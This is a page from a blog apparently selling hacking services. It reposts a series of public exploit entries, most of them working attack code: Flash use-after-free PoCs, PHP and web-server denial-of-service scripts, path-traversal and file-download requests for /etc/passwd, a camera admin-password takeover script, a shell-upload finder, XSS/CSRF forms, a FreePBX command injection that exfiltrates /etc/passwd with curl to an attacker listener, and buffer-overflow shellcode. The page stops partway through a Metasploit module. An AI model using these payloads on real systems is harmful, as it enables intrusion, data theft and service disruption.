Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863589849

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=838

There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.

A proof-of-concept is as follows:

this.createEmptyMovieClip("mc", 2);
var o = { toString : f };
mc.func = ASnative(666, 4); //Stage.align setter
mc.func(o);

function f(){
	
	trace("here");
	mc.removeMovieClip();
	for(var i = 0; i < 100; i++){	
		var t = new TextFormat(); // fill up the slots
		
		}
	}

A fla and swf are attached. The swf crashes in Chrome for Windows.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40308.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841

There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.

A minimal PoC follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

	}

A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40307.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842

Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:

var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();

function func(){
	
	mc.removeMovieClip();
	
	// fix heap
	
	return r;
	
	}
	

A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40309.zip
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 xmldocfile() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
xmldocfile($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 simplexml_load_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
simplexml_load_file($str);
?>
HireHackking 
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
#Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________

GET
/cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive

Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
path=/


#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
HireHackking 
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
	public $obj;
    function __clone()
    {
		$this->obj = clone $this;
		return $this->obj;
    }
}
$obj	= new MyCloneableClass();
$obj2 	= clone $obj;
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 domxml_open_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
domxml_open_file($str);
?>
HireHackking 
#!/bin/bash
#
#  INTELLINET IP Camera INT-L100M20N remote change admin user/password 
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
 
if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "  [ INTELLINET IP Camera INT-L100M20N  remote change admin user/password"
        echo "  [ ==="
        echo "  [ Usage: $0 <target> <user> <password>"
        echo "  [ Example: $0 192.168.1.200:80 admin teflon"
        echo "  [ ==="
        echo "  [ Copyright 2016 (c) Todor Donev  <todor.donev at gmail.com>" 
        echo "  [ Website:   http://www.ethical-hacker.org/"
        echo "  [ Facebook:  https://www.facebook.com/ethicalhackerorg "
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  [ Error : libwww-perl not found =/"
        exit;
fi
        GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1
HireHackking 
'''
#
# Updated Exploit Provided by Drew Griess
#
# Exploit Title HelpDeskZ = v1.0.2 - Unauthenticated Shell Upload
# Google Dork intextHelp Desk Software by HelpDeskZ
# Date 2016-08-26
# Exploit Author Lars Morgenroth - @krankoPwnz
# Vendor Homepage httpwww.helpdeskz.com
# Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip
# Version = v1.0.2
# Tested on
# CVE

HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.

The software in the default configuration allows upload for .php-Files ( !! ). I think the developers thought it was no risk, because the filenames get obfuscated when they are uploaded. However, there is a weakness in the rename function of the uploaded file

controllers httpsgithub.comevolutionscriptHelpDeskZ-1.0tree006662bb856e126a38f2bb76df44a2e4e3d37350controllerssubmit_ticket_controller.php - Line 141
$filename = md5($_FILES['attachment']['name'].time())...$ext;

So by guessing the time the file was uploaded, we can get RCE.

Steps to reproduce

httplocalhosthelpdeskzv=submit_ticket&action=displayForm

Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.

Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded

exploit.py httplocalhosthelpdeskz phpshell.php
'''
import hashlib
import time
import sys
import requests
import datetime

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]


r = requests.get(helpdeskzBaseUrl)

#Gets the current time of the server to prevent timezone errors - DoctorEww
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z')  - datetime.datetime(1970,1,1)).total_seconds())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print 'found!'
        print url
        sys.exit(0)

print 'Sorry, I did not find anything'
'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Date: 2016-08-26
# Exploit Author: Lars Morgenroth - @krankoPwnz
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :

HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.

The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file:

/controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141*
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;

So by guessing the time the file was uploaded, we can get RCE.

Steps to reproduce:

http://localhost/helpdeskz/?v=submit_ticket&action=displayForm

Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.

Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:

exploit.py http://localhost/helpdeskz/ phpshell.php

import hashlib
import time
import sys
import requests

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

currentTime = int(time.time())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)

print "Sorry, I did not find anything"
'''
HireHackking 
"""
# Exploit Title: Goron Web Server 2.0 - Multiple Vulnerabilities
# Date: 26/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://sourceforge.net/projects/goron/
# Software Link: http://master.dl.sourceforge.net/project/goron/goron/goron2.0/GoronWin32.zip
# Version: 2.0
# Tested on: Windows 7 Family x64 (FR)
# Category: webapps
 

Disclosure Timeline:
--------------------
2016-08-15: Vulnerabilities discovered
2016-08-23: Developper contacted via Twitter
2016-08-24: Developper contacted me back
2016-08-25: Developper informed me that Goron is no longer maintained (EOL)
2016-08-26: Exploits published
 
  
Description :
-------------
Multiple vulnerabilities exist in Goron Web Server 2.0 for Windows. They allow an attacker to remotely DoS the server, or to abuse XSS or CSRF flaws by
sending a crafted email to the web server administrator.
  


[VULNERABILITY 1/3]: REMOTE DENIAL OF SERVICE (DOS)
___________________________________________________________________________________________________________

By connecting multiple times to the web server and sending long packets, it is possible to crash the server.
Below is an example of a working python exploit.
"""

#!/usr/bin/python
import socket, time

host    = "192.168.241.130"
port    = 80
junk    = '\x41' * 100000
buffer  = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n"

print "\nExploit Title  : Goron 2.0 - Denial of Service"
print "Exploit Author : @gkweb76\n"

try:
        print "[*] Connecting to %s:%d" % (host, port)
        for count in range(100000):
            print "[*] Sending buffer... (%d)" % count
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                s.connect((host, port))
            except:
                time.sleep(1)
                s.connect((host, port))
            s.send(buffer)
            s.close()
        print "[-] Goron not crashed?"
except:
        print "\n[*] Goron Web Server seems crashed!"
		


"""
[VULNERABILITY 2/3]: WEBMIN.RB AND CONFIG.RB CROSS SITE SCRIPTING (XSS)
___________________________________________________________________________________________________________
The webmin.rb and config.rb files are both vulnerable to XSS in various parameters.
Config.rb can be abused directly with a GET request via the 'node' parameter like below:"""

GET http://remote_host/config.rb?node=<script>alert('XSS here')</script> HTTP/1.1

"""It should be noted that config.rb is accessible by default, and allows to retrieve in plain text the admin password of webmin.rb if one has been set.
It should be considered a default configuration password disclosure vulnerability in itself, but it is one of the purpose of this page to display the 
server's configuration, including password. Config.rb should thus be restricted, which is not the case on the default install:"""

GET http://remote_host/config.rb?node=Root/System/MainPassword HTTP/1.1

"""
Webmin.rb by default is not password protected, but a password can be set to enforce an HTTP BASIC authentication. Webmin.rb panel enables the
administrator to stop/restart the server, display logs, change password, etc... Each request action is in the following form:"""

POST http://remote_host/webmin.rb HTTP/1.1
data: action=<action here>

"""
This 'data' parameter is compared to a list of allowed actions such as 'StopServer' or 'ShowGUI'. If the action is unknown, the web page is rebuilt and
displays the action parameter content on the top of the page without sanitation, allowing XSS:"""

POST http://remote_host/webmin.rb HTTP/1.1
data: action=<script>alert('XSS here')</script>

"The form below allows to exploit this XSS:"

<html><body>

<form method="post" action="http://remote_host/webmin.rb">
<input type="hidden" name="action" value="<script>alert('XSS here')</script>"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>

</body></html>

"""
[VULNERABILITY 3/3]: WEBMIN.RB CROSS SITE REQUEST FORGERY (CSRF)
___________________________________________________________________________________________________________
The webmin.rb does not have CSRF protection. This allows an attacker to send a crafted email to do any action the webmin page allows to,
such as modifying admin password as below:"""

POST http://192.168.241.130/webmin.rb HTTP/1.1
data: action=SetPassword
data: newPassword=mypassword

"The form below allows to exploit this CSRF:"

<html><body>

<form method="post" action="http://remote_host/webmin.rb">   
<input type="hidden" name="action" value="SetPassword"/>
<input type="hidden" name="newPassword" value="mypassword"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>

</body></html>
HireHackking 
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : Ahmed sultan (0x4148)
Email : 0x4148@gmail.com

Summary : 

FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server,
With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly,
the FreePBX community continues to out-perform the industry's commercial efforts.
The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world.

Vulnerability details :

Freepbx suffer from (Authenticated) remote code execution flaw 

Boring technical stuff

File : functions.inc.php

function get_headers_assoc($url) {
global $amp_conf;
if ($amp_conf['MODULEADMINWGET']) {
FreePBX::Curl()->setEnvVariables();
exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus);
$headers = array();
if($exitstatus == 0 && !empty($wgetout)) {
foreach($wgetout as $value) {
$ar = explode(':', $value);
$key = trim($ar[0]);
        if(isset($ar[1])) {
          $value = trim($ar[1]);
          $headers[strtolower($key)] = trim($value);
        }

the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw
The function is being called at

File : libraries/modulefunctions.class.php

Line 1539 : function handledownload($module_location, $progress_callback = null) {
...................................................
// invoke progress callback
if (!is_array($progress_callback) && function_exists($progress_callback)) {
$progress_callback('getinfo', array('module'=>$modulename));
} else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) {
$progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename));
}

$file = basename($module_location);
$filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file;

// Check each URL until get_headers_assoc() returns something intelligible. We then use
// that URL and hope the file is there, we won't check others.
-=>>>>>> $headers = get_headers_assoc($module_location);
if (empty($headers)) {
return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location));
} 

the handledownload function is called via the admin panel whenever the page.modules.php file is included
which can be basically done using admin/config.php?display=modules

File : page.modules.php

Line 174 : switch ($action) {
..............................
Line 643 : case 'upload':
..............................
Line 658 : $displayvars['processed'] = false;
if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) {
$displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']);
$displayvars['processed'] = true;
} elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) {
$displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']);
$displayvars['processed'] = true;
} elseif(isset($_REQUEST['remotemod'])) {
$displayvars['res'][] = 'Nothing to download or upload';
$displayvars['processed'] = true;
}

the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw

POC

On attacker's side run nc -lvp 8080

on target's side loginto the panel and then browse to

http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk

Result

[0x4148:/lab]# nc -lvp 8080
listening on [any] 8080 ...
DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com
connect to [ATTACKER] from x.x.x.x.x [Target] 45934
POST //0x4148.jnk HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Host: ATTACKER:8080
Accept: */*
Content-Length: 1391
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
asterisk:x:499:498::/home/asterisk:/bin/bash
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
prosody:x:496:495::/var/lib/prosody:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
HireHackking 
'''
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec


Vendor:
===================
nscan.hypermart.net


Product:
======================================
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13 
circa 1999

NScan is one of the most fast and flexible portscanners for Windows. It is specially designed for scanning large networks and gathering
related network/host information. It supports remote monitoring, usage of host and port lists, option profiles, speed and accuracy tuning,
etc. It also contains a traceroute, dig and whois, which work together with scanner.


Vulnerability Type:
================
Buffer Overflow


Vulnerability Details:
=====================

dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups, this component has a trivial buffer overflow vulnerability.
1,001 bytes direct EIP overwrite our shellcode will be sitting at ESP register.

Important we need \x2E\x2E in the shellcode! WinExec(calc.exe) as once it is injected it gets converted to an unusable character and will fail
to execute. However, we can bypass this by double padding our shellcode \x2E\x2E instead of a single \x2E now it will Execute!

payload="A"*997+"RRRR" <===== EIP is here

1) use mona or findjmp.exe to get suitable JMP ESP register
2) run python script below to generate exploit payload
3) paste payload into DNS lookup 'Target' input field
4) Click 'TCP lookup' button
5) BOOM see calc.exe run!


Stack dump...

EAX 00000021
ECX 2D680000
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_NO_MORE_FILES (00000012)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


Exploit code(s):
===============
'''

import struct

#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#================================

#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes, have use !mona jmp -r esp
#plugin or findjmp.exe.

rp=struct.pack("<L", 0x75658BD5)  #JMP ESP kernel32

# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65"  #<=== \x2E\x2E (Deal with "." character problem)
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


payload="A"*997+rp+"\x90"*10+sc

file=open("NECRO", "w")
file.write(payload)
file.close()

print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='


'''
Exploitation Technique:
=======================
Local


Severity Level:
================
High


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
'''
HireHackking 
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com

### SUMMARY

CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request 
to http://server/wp-content/plugins/cysteme-finder/php/connector.php 

This allows attackers to upload, download, and browse the remote file system. 

### LFI

- Retrieve all data in the root wordpress directory. This will return JSON. 
Exploit: 
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1

Reply:
{
  "cwd": {
    "mime": "directory",
    "ts": 1471999484,
    "read": 1,
    "write": 1,
    "size": 0,
    "hash": "l1_Lw",
    "volumeid": "l1_",
    "name": "Fichiers du site",
    "date": "Today 20:44",
    "locked": 1,
    "dirs": 1
  },
  "options": {
    "path": "Fichiers du site",
    "url": null,
    "tmbUrl": "",
    "disabled": [
      
    ],
    "separator": "\/",
    "copyOverwrite": 1,
    "archivers": {
      "create": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2"
      ],
      "extract": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2",
        "application\/zip"
      ]
    }
  },
  "files": [
    {
      "mime": "directory",
      "ts": 1471999484,
      "read": 1,
      "write": 1,
      "size": 0,
      "hash": "l1_Lw",
      "volumeid": "l1_",
      "name": "Fichiers du site",
      "date": "Today 20:44",
      "locked": 1,
      "dirs": 1
    },
    {
      "mime": "text\/plain",
      "ts": 1471714510,
      "read": 1,
      "write": 1,
      "size": 813,
      "hash": "l1_Lmh0YWNjZXNz",
      "name": ".htaccess",
      "phash": "l1_Lw",
      "date": "20 Aug 2016 13:35"
    },

Simply replacing wphome with any other directory path will return file information for that directory. 
If you want to download that file, get the hash value for the file and include it in the following request:
 
Will download /etc/passwd
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1

### File Upload

As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following. 

POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

----------723608748
Content-Disposition: form-data; name="cmd"

upload
----------723608748
Content-Disposition: form-data; name="target"

l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html

<?php phpinfo(); ?>
----------723608748--
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
      'Description'    => %q{
        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
        Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
        then silently installs malware.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'CrashBandicot @DosPerl', #initial discovery
          'Jay Turla <@shipcod3>', #msf module
        ],
      'References'     =>
        [
          [ 'EDB', '40047' ],
          [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 200,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Jul 01 2016',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
      ],self.class)
  end

  def check
    test = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{test};")
    if res && res.body.include?(test)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

